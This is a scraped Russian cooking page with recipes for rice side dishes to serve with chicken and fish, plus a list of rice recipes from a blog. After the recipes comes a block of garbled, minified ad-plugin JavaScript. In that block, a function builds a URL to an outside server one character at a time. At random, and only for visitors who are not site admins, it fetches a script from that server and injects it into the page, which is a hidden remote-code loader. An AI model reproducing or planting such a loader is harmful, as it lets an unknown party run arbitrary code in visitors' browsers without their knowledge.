Гарнир из риса к курице рецепт

Гарнир из риса к курице рецепт

Ингредиенты

Пошаговый рецепт приготовления Гарнир из риса к курице с фото

Рассыпчатый рис на гарнир

Ингредиенты:
вода – 750 миллилитров;
рис – 2 стакана.

Итак, сначала промойте хорошенько рис.

Промытую рисовую крупу переложите в кастрюлю, влейте сюда же холодную воду и отправьте емкость с содержимым на огонь.

Когда жидкость с рисом начнем кипеть, накройте кастрюлю крышкой, сделайте слабый огонь и варите крупу 15 минут. Во время варки рис не нужно перемешивать.

По истечении указанного времени отключите огонь, крышку не снимайте, пусть рис настоится. Перед тем как будете рассыпать рисовый гарнир в тарелочки, посолите его и перемешайте!

Рис на гарнир в мультиварке

Ингредиенты:
вода – 2 стакана;
рис – 1 стакан;
сливочное масло, соль – по своему вкусу.

А теперь займемся работой:

Итак, сначала следует помыть хорошенько рисовую крупу.

Затем переложите рис в мультиварочную чашу, влейте сюда же воду.

Теперь в чашу нужно добавить соль и сливочное масло.

Включите режим «рис», таймер установите на полчаса.

Когда прозвучит сигнал, не спешите перекладывать гарнир, пусть он постоит еще в чаше минут 15. А потом можете отведать вкуснейший рисовый гарнир!

Рис на гарнир к курице

Ингредиенты:
лук – 1 головка;
длиннозернистый рис – 1 стакан;
томатная паста – 1 столовая ложка;
помидоры – 2 штуки;
вода – 1 стакан;
чеснок – 3 зубка;
соль – по своему вкусу;
лайм – 1 штука;
перец чили;
растительное масло – 1 чайная ложка.

Приступим к работе:

Сначала промойте хорошенько рисовую крупу, замочите ее в воде, пусть постоит 10 минут.

Почистите лук, помойте помидоры.

Данные два ингредиента измельчите с помощью блендера, должно получиться пюре.

Слейте с риса воду, переложите его на отрез бумажного полотенца, пусть подсохнет.

Поставьте сковородку на огонь, разогрейте масло и отправьте в сковородку рис.

Почистите и измельчите чеснок.

Нарежьте мелкими кусочками чили.

Перец с чесноком отправьте в сковородку с рисом.

Пюре из помидор и лука размешайте с водой, добавьте томатную пасту, соль, перемешайте и соус готов.

Соус влейте в сковородку к обжаренному рису, сделайте слабый огонь, накройте крышкой, пусть кушанье тушится 15 минут.

Когда истечет указанное время, добавьте в блюдо сок лайма, перемешайте и отключите огонь. Вот и все, вкусный ароматный гарнир из риса к курице готов!

Видеорецепт Гарнир из риса к курице

Вкусный рис на гарнир к курице

Вкусный рис на гарнир к курице можно приготовить и по другому рецепту. Это рисовое кушанье обладает приятным нежным оригинальным вкусом и ароматом!

Итак, для того чтобы приготовить рис по этому рецепту вам понадобится:

Ингредиенты:
лук – 1 головка;
растительное масло – 2 столовые ложки;
рис – 1,5 стакана;
вода – 2 стакана;
аджика – 0,5 стакана;
соль – по своему вкусу.

Ну что ж займемся делом:

    Возьмите глубокую сковородку, разогрейте растительное масло.

Почистите и измельчите лук, отправьте его обжариваться.

  • Помойте хорошенько рисовую крупу и отправьте обжариваться к луку, перемешайте ингредиенты, вейте сюда же воду, добавьте аджику, соль, сделайте слабый огонь, накройте сковородку крышкой и готовьте гарнир 20 минут. Вот и все, по истечении указанного времени вы отведаете невероятно вкусный рисовый гарнир!
  • Приятного Вам аппетита!

    Вкусный рис на гарнир: рецепт с фото пошагово

    Рис – это очень вкусный гарнир, но рисовая крупа очень капризная и здесь важно правильно приготовить ее, иначе зернышки слипнутся, и получится вязкая, клейкая масса. Не все знают, как вкусно приготовить рис на гарнир, ведь главный секрет – это правильно выбранный продукт. Есть много разновидностей рисовой крупы, которые используются в том или ином рецепте, с фото пошагово мы предлагаем читателям несколько интересных идей.

    Рис нужно покупать только в прозрачных упаковках, сквозь которые можно разглядеть качество. Если в крупе попадается много сколов и половинок, лучше воздержаться от покупки. Также некачественным считается слишком белый рис, это означает, что зернышки не дозрели.

    Гарнир к рыбе

    Хотите узнать, как вкусно и просто приготовить рис на гарнир к рыбе? Тогда знакомьтесь с нашим рецептом. Такой гарнир можно приготовить несколькими способами, например, пошагово приготовить все в сковороде, в казане, в мультиварке или в духовке.

    Ингредиенты:

    • рис длиннозернистый – 1 стакан;
    • репчатый лук – 1 шт.;
    • вода – 1,2 л;
    • морковь – 3 шт.;
    • соль – 1 ст. л.;
    • топленое масло – 70 г;
    • специи – по вкусу.

    Приготовление:

    • Подготавливаем продукты для гарнира. Овощи очищаем и моем. Рис несколько раз промываем, заливаем теплой водой и отставляем. Репчатый лук нарезаем четверть-кольцами, а морковь трем на крупной терке или используем терку для корейской моркови.

    • Разогреваем сковороду на плите, добавляем в нее 50 г масла. Когда масло растопится отправляем жариться нарезанный лук. Жарим до появления золотистого цвета и высыпаем морковь. Перемешиваем, накрываем крышкой и томим на слабом огне 10-12 минут.
    • К протушеным овощам отправляем промытый рис, специи, топленое масло (оставшиеся 20 г) и соль. Перемешиваем и заливаем содержимое кипятком. Вода должна покрывать рис с овощами на 1 см выше.

    • Плиту ставим на средний огонь и ждем закипания. Когда это произойдет, снижаем огонь до минимума и накрываем крышкой. Тушим 25-30 минут.
    • После приготовления гарнир держим под закрытой крышкой еще 10-15 минут.

    • Блюдо подается к жареной или тушеной рыбе. Приятного аппетита!

    Рис карри с морковью

    О том, как вкусно приготовить рис на гарнир к рыбе или курице, расскажет наш следующий рецепт с фото. Цвет блюда получается солнечным, вкус прекрасным и аромат превосходным. Для этого варианта блюда нужен длиннозернистый рассыпчатый сорт риса, а готовить его следует в чугунном казане.

    Ингредиенты:

    • рис – 1 стакан;
    • вода – 2,5 стакана;
    • соль – по вкусу;
    • морковь – 2 шт.;
    • чеснок – 2 зубчика;
    • растительное масло – 4 ст. л.;
    • приправа карри – 1,5 ч. л.

    Приготовление:

    • Рис предварительно промываем несколько раз. Важно, чтобы последняя вода была прозрачная, тогда гарнир получится рассыпчатым.

    • В казан наливаем 2 ст. л. растительного масла, разогреваем немного и отправляем туда рис. Обжариваем на среднем огне 10-15 минут, регулярно перемешивая.

    • Дальше наливаем в казан воду, солим по вкусу, перемешиваем еще раз и накрываем крышку. Огонь снижаем до минимума и тушим 20 минут. За этот период перемешивать рис не нужно. Пока варится рис, подготавливаем овощи. Все очищаем и моем под краном.
    • Морковь трем на крупной терке или на терке для корейской моркови, также можно нарезать овощ соломкой при помощи ножа (кому как нравится).

    • Чеснок нарезаем тонкими слайсами.

    • Берем большую сковороду, наливаем в нее 2 ст. л. растительного масла и разогреваем. Выкладываем морковь и обжариваем ее 5 минут. После чего добавляем чеснок и жарим еще 2-3 минуты.

    • Обжаренную морковь приправляем карри (тем, кто любит пряный вкус объем приправы можно увеличить).
    • Готовый рис перекладываем в сковороду. Хорошо перемешиваем, накрываем крышкой и томим на слабом огне 10 минут.

    • Подавать горячим, как гарнир к куриному мясу или рыбе.

    Гарнир из риса с овощами в мультиварке

    Каждая хозяйка всегда думает, как вкусно накормить семью из простых продуктов? Можно приготовить рис на гарнир с овощами в мультиварке, а наши рецепты с фото станут помощниками даже начинающим кулинарам. Мультиварка уже давно стала незаменимым кухонным атрибутом, готовить блюда в ней просто, достаточно правильно соединить ингредиенты и выставить режим. Тем более что овощи рису добавят легкий, свежий аромат и гарнир получится необычайно аппетитным.

    Ингредиенты:

    • рис различных сортов – 200 г;
    • болгарский перец сладкий – 1 шт.;
    • растительное масло – 40 мл;
    • бульонный кубик – 0,5 шт.;
    • репчатый лук – 1 шт.;
    • морковь – 1 шт.;
    • вода – 300 мл;
    • соль, специи – по вкусу.

    Приготовление:

    • Рис нескольких сортов соединяем между собой и хорошо промываем водой. Выкладываем крупу в дуршлаг, чтобы извлечь ее от лишней влаги.
    • Репчатый лук очищаем и моем. Мелко нарезаем его ножом.

    • Морковь также очищаем от кожуры и трем ее на терке с крупным сечением.

    • С болгарского перца удаляем внутренность, убираем семена и прожилки. Моем и нарезаем мелкими квадратиками.

    • Воду для варки риса нагреваем и растворяем в ней бульонный кубик.
    • В чашу мультиварки наливаем растительного масла и высыпаем рис. Соединяем его с овощами и хорошенько перемешиваем.
    • Накрываем крышкой чашу и включаем режим «плов». Время выставляем на 30 минут. После этого крышку емкости не открываем, а оставляем в таком виде еще на 10-15 минут.

    • Очень вкусный гарнир готов. Подаем горячим к курице или рыбе.

    Вариантов приготовления риса очень много, поэтому оставайтесь с нами, и вы узнаете, как вкусно приготовить рис на гарнир, ведь все наши рецепты не только с пошаговым описанием, но и для наглядности с фото. Любой кулинар легко приготовит рис на обед и порадует свою семью вкусными и простыми блюдами.

    Куриное филе с семечками и гарниром из риса

    для гарнира

    Ещё один вариант быстрого вкусного обеда или ужина — это курица в панировке из семечек с рисом на гарнир. Курица получается сочной и
    нежной. Семечки придают особую хрустинку и очень гармонично сочетаются с мясом. Специи можно использовать любые, которые вам
    нравятся больше всего. За рецепт спасибо Ирине Хлебниковой.

    Автор публикации

    Екатерина Пацкевич

    Екатерина Пацкевич

    Родом из Беларуси. Мама двух детишек – Мирославы и Воислава, любящая и любимая жена. По образованию учитель по классу баяна. Творческая натура хочет уметь всё: шить, лепить из полимерной глины, готовить и, конечно же, фотографировать. Считает, что есть к чему стремиться, а самое главное, есть желание, поэтому уверена, что со временем всё будет только лучше.

    Подготовить все ингредиенты. Семечки слегка обжарить на сухой сковороде.

    Куриные грудки промыть под проточной водой, удалить кость и хрящи, обсушить бумажным полотенцем филе, разрезать вдоль, чтобы мясо было одной толщины. Мясо натереть растительным маслом, посолить, поперчить, накрыть крышкой или тарелкой и отставить мариноваться на 15-20 минут.

    Пока мясо маринуется, можно приготовить гарнир. Промыть рис под проточной водой несколько раз, пока вода не станет полностью прозрачной и откинуть на дуршлаг. В сковороде разогреть растительное масло, обжарить мелко нарезанный лук до прозрачности или
    золотистости. Туда же выложить рис и обжарить на среднем огне 2-3 минуты до прозрачности зёрнышек. Рис с луком залить горячей водой, посолить и перемешать. Закрыть крышкой и тушить на умеренном огне 15-20 минут, не поднимая крышку.

    Включить разогреваться духовку до 200 градусов. Яйцо смешать с молоком и взболтать вилкой, немного посолить. На отдельную тарелку
    насыпать муку для панировки филе. Курицу обвалять в муке, затем в яично-молочной смеси, обжарить на растительном масле с двух сторон до
    золотистой корочки. Оставить немного яичной смеси.

    Обжаренное филе смазать оставшимся кляром при помощи силиконовой кисти, обсыпать семечками с одной стороны и ещё раз слегка обмазать кляром. Выложить в жаропрочную форму и запекать 10 минут при температуре 200 градусов.

    Готовое филе выложить на тарелку, добавить гарнир, украсить на свой вкус. Подавать горячим. Куриное филе с семечками готово. Приятного аппетита!

    Советы по приготовлению:

    Вместо филе можно использовать любые части курицы.
    Вместо риса можно взять любой гарнир или же просто подать с салатом из свежих овощей.

    Куриное филе с семечками и гарниром из риса

    Ещё один вариант быстрого вкусного обеда или ужина — это курица в панировке из семечек с рисом на гарнир. Курица получается сочной и
    нежной. Семечки придают особую хрустинку и очень гармонично сочетаются с мясом. Специи можно использовать любые, которые вам
    нравятся больше всего. За рецепт спасибо Ирине Хлебниковой.

    Автор публикации

    Екатерина Пацкевич

    Ингредиенты

    • 400 гр грудка куриная
    • 10 гр семечки подсолнечника
    • 1 шт. яйцо
    • 1 ст.л. молоко
    • 2 ст.л. мука пшеничная
    • 2 ст.л. масло растительное
    • перец чёрный молотый
    • соль
    • 100 гр лук репчатый
    • 180 гр рис длиннозёрный
    • 500 мл кипяток
    • 2 ст.л. масло растительное
    • соль

    Способ приготовления

    Подготовить все ингредиенты. Семечки слегка обжарить на сухой сковороде.

    Куриные грудки промыть под проточной водой, удалить кость и хрящи, обсушить бумажным полотенцем филе, разрезать вдоль, чтобы мясо было одной толщины. Мясо натереть растительным маслом, посолить, поперчить, накрыть крышкой или тарелкой и отставить мариноваться на 15-20 минут.

    Пока мясо маринуется, можно приготовить гарнир. Промыть рис под проточной водой несколько раз, пока вода не станет полностью прозрачной и откинуть на дуршлаг. В сковороде разогреть растительное масло, обжарить мелко нарезанный лук до прозрачности или
    золотистости. Туда же выложить рис и обжарить на среднем огне 2-3 минуты до прозрачности зёрнышек. Рис с луком залить горячей водой, посолить и перемешать. Закрыть крышкой и тушить на умеренном огне 15-20 минут, не поднимая крышку.

    Включить разогреваться духовку до 200 градусов. Яйцо смешать с молоком и взболтать вилкой, немного посолить. На отдельную тарелку
    насыпать муку для панировки филе. Курицу обвалять в муке, затем в яично-молочной смеси, обжарить на растительном масле с двух сторон до
    золотистой корочки. Оставить немного яичной смеси.

    Обжаренное филе смазать оставшимся кляром при помощи силиконовой кисти, обсыпать семечками с одной стороны и ещё раз слегка обмазать кляром. Выложить в жаропрочную форму и запекать 10 минут при температуре 200 градусов.

    Готовое филе выложить на тарелку, добавить гарнир, украсить на свой вкус. Подавать горячим. Куриное филе с семечками готово. Приятного аппетита!

    LiveInternetLiveInternet

    Метки

    Рубрики

    • Здоровье (3722)
    • Кулинария (3566)
    • Рецепты (3555)

    Поиск по дневнику

    Подписка по e-mail

    Статистика

    Рисовая каша — и сытный завтрак, и гарнир

    Среда, 09 Августа 2017 г. 14:32 + в цитатник

    Рисовая каша

    Казалось бы, такие знакомые ингредиенты – мясо, рис, морковь и лук. Думаете, плов? Не угадали. Это русская полевая каша. Варили ее из пшена, на костре. А этот рецепт – как вариант полевой каши, приготовленной в домашних условиях.

    Как приготовить рис с овощами, используя самые обычные сезонные овощи – морковь, помидоры, перец? Этот рецепт риса с овощами предложит вам простой и быстрый способ приготовления этого блюда.

    Сладкая рисовая каша со свежими фруктами – идеальное блюдо для вкусного здорового завтрака!

    Очень простой гарнир из риса. Необычность этого рецепта в том, что в самый последний момент перед подачей блюда в рис добавляют миндаль и смородину.

    Рис с томатами – постное и легкое блюдо, которое также подойдет вегетарианцам и тем, кто соблюдает низкокалорийную диету.

    Простое постное блюдо из риса.

    Приготовленный так рис вкусен как самостоятельное блюдо, а может быть подан в качестве гарнира к любому мясному блюду или к рыбе.

    Приготовила рис на Хэллоуин. Но буду готовить “и в будни”, так как это необычное блюдо из риса получилось вкусным)))

    Хорош на гарнир жареный рис к курице или рыбе. А в пост это шикарное ароматное самостоятельное блюдо. Рис получается рассыпчатым, рисинка к рисинке.

    Для этого блюда нужно отварить рис и отдельно приготовить чесночный соус.

    Предлагаем приготовить на гарнир вкусный рассыпчатый рис. Рис по этому рецепту сначала отваривают в подсоленной воде, а затем продолжают готовить в духовке на водяной бане.

    Рис с баклажанами – отличный вариант для постного меню.

    Приближается Пост, и рецепт рассыпчатого риса с карри будет очень актуален! Блюдо является полностью постным, но в то же время питательным.

    Приготовим на гарнир рис на сковороде. Сковорода должна быть с толстым дном. Рис возьмем длиннозернистый, как для плова. Рис хорош на гарнир к рыбе и мясу. В пост – отличное самостоятельное блюдо.

    Отличный завтрак для всей семьи. Рекомендую, моя любимая молочная рисовая каша с изюмом.

    Лосось – рыба полезная, богата полезными минералами, витаминами и микроэлементами. Приготовьте рис с лососевыми брюшками, и вам непременно понравится это блюдо!

    Прекрасный гарнир как к мясу, так и к рыбе. И выручает рис рассыпчатый в постные дни, когда прекрасно сочетается просто с овощами.

    Не рецепт, а чистое здоровье. Предложу на завтрак отличную рисовую кашу. Да не простую, а с курагой, изюмом и черносливом. Вкусно? Не то слово!:) Полезно? Безусловно.

    Отличный гарнир – рис отварной, шикарный завтрак в постный день.

    Готовим в мультиварке хоть на ужин, хоть на гарнир вкусную кашу рисовую. Да не простую, а с овощами.

    Такое блюдо, как плов, знают и любят все, но зачастую шавлёй называют неудавшийся плов. Хотя, на самом деле, это не так. Шавля – это рисовая каша с мясом по-узбекски, рецептурно и технологически отличающаяся от плова. Шавля имеет отличный вкус и очень богатый аромат.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};